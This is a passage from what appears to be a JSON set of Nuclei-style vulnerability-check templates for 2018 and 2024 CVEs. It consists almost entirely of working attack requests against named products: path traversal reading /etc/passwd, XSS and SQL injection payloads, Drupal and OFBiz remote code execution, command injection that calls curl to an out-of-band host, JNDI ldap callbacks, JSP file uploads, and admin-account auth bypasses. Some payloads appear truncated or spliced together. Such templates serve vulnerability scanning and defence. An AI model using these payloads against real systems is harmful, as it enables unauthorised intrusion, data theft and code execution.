Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \">\")"],"condition":"and"}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \">\")"],"condition":"and"}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\">","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4ncu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7282","info":{"name":"TITool PrintMonitor - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"PrintMonitor\") && contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["JSmol2WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nReferer: {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8- Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\n\\nimg\\n\"}}],\"filters\":{\"dimensions\":[],\"metrics\":[],\"tableCalculations\":[]},\"name\":\"my dashboard\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"status\":\"ok\""],"internal":true}]},{"raw":["POST /api/v1/dashboards/{{dashuuid}}/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"queryFilters\":\"\",\"gridWidth\":1400}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\")","contains(interactsh_request, \"connect.sid=\")","contains(body, \"status\\\":\\\"ok\")"],"condition":"and"}]}]},{"id":"CVE-2024-23334","info":{"name":"aiohttp - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["aiohttp","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4358","info":{"name":"Progress Telerik Report Server - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /Startup/Register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUsername={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}\n","POST /Token HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=password&username={{user}}&password={{pass}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains_all(body_2, \"access_token\", \"userName\", \"token_type\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"token","part":"body_2","group":1,"regex":["\"access_token\":\"([A-Z0-9a-z_-]+)\""],"internal":true},{"type":"dsl","dsl":["\"Username: \"+ user","\"Password: \"+ pass"]}]}]},{"id":"CVE-2024-38856","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/main/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3753","info":{"name":"Hostel < 1.1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/hostel"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wphostel_bookings&do=edit&id=&type=upcoming&offset=\">"]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-22319","info":{"name":"IBM Operational Decision Manager - JNDI Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"patchLevel\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-24809","info":{"name":"Traccar - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /api/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{name}}\", \"email\": \"{{email}}\", \"password\": \"{{password}}\", \"totpKey\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"administrator\":","\"fixedEmail\""],"condition":"and","internal":true}]},{"raw":["POST /api/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;charset=UTF-8\n\nemail={{email}}&password={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceReadonly\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{unique}}\", \"uniqueId\": \"{{unique}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"calendarId\"","\"groupId\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".id"]}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"extractors":[{"type":"regex","part":"body","name":"filename","internal":true,"regex":["device\\.([a-zA-Z]+)"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /api/devices/{{value}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": {{value}}, \"attributes\": {\"deviceImage\": \"device.png\"}, \"groupId\": 0, \"calendarId\": 0, \"name\": \"test\", \"uniqueId\": \"{{unique}}/../../../../../opt/traccar/modern\", \"status\": \"offline\", \"lastUpdate\": null, \"positionId\": 0, \"phone\": null, \"model\": null, \"contact\": null, \"category\": null, \"disabled\": false, \"expirationTime\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceImage\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]}]},{"id":"CVE-2024-7354","info":{"name":"Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/ninja-forms"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-submissions&\">=2 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\">"]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-20767","info":{"name":"Adobe ColdFusion - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1\nHost: {{Hostname}}\n","GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1\nHost: {{Hostname}}\nuuid: {{extracted_uuid}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'wddxPacket')","contains(header_2, 'application/json')","contains(body_2, '/bin/bash')"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"extracted_uuid","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2024-45241","info":{"name":"CentralSquare CryWolf - Path Traversal","severity":"high"},"requests":[{"raw":["GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Powered by CryWolf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /gdoc1.ashx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type,\"application/pdf\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-46627","info":{"name":"DATAGERRY - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/users/1/settings/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"response_type\":","\"model\":","\"time\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2024-36527","info":{"name":"Puppeteer Renderer - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21887","info":{"name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","severity":"critical"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"result\":","\"message\":"],"condition":"and"}]}]},{"id":"CVE-2024-22024","info":{"name":"Ivanti Connect Secure - XXE","severity":"high"},"requests":[{"raw":["POST /dana-na/auth/saml-sso.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLRequest={{base64(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-39914","info":{"name":"FOG Project < 1.5.10.34 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /management/export.php?filename=$(echo+''+>+{{filename}}.php)&type=pdf HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfogguiuser=fog&nojson=2\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"No HTML files!\",\"HTMLDOC\")","contains(content_type, \"application/pdf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /management/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4443","info":{"name":"Business Directory Plugin <= 6.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1]= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"Business Directory\",\"No listings found\")"],"condition":"and"}]}]},{"id":"CVE-2024-4836","info":{"name":"Edito CMS - Sensitive Data Leak","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains_any(body,\"content=\\\"edito\", \"www.edito.pl\")","status_code==200"],"condition":"and","internal":true}]},{"method":"GET","path":["{{BaseURL}}/config.php","{{BaseURL}}/config/config.php","{{BaseURL}}/include/config.php","{{BaseURL}}/includes/config.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"db_password\", \"db_username\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-29272","info":{"name":"VvvebJs < 1.7.5 - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfile=demo/landing/index.php&html={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"File saved\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /demo/landing/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6670","info":{"name":"WhatsUp Gold HasErrors SQL Injection - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 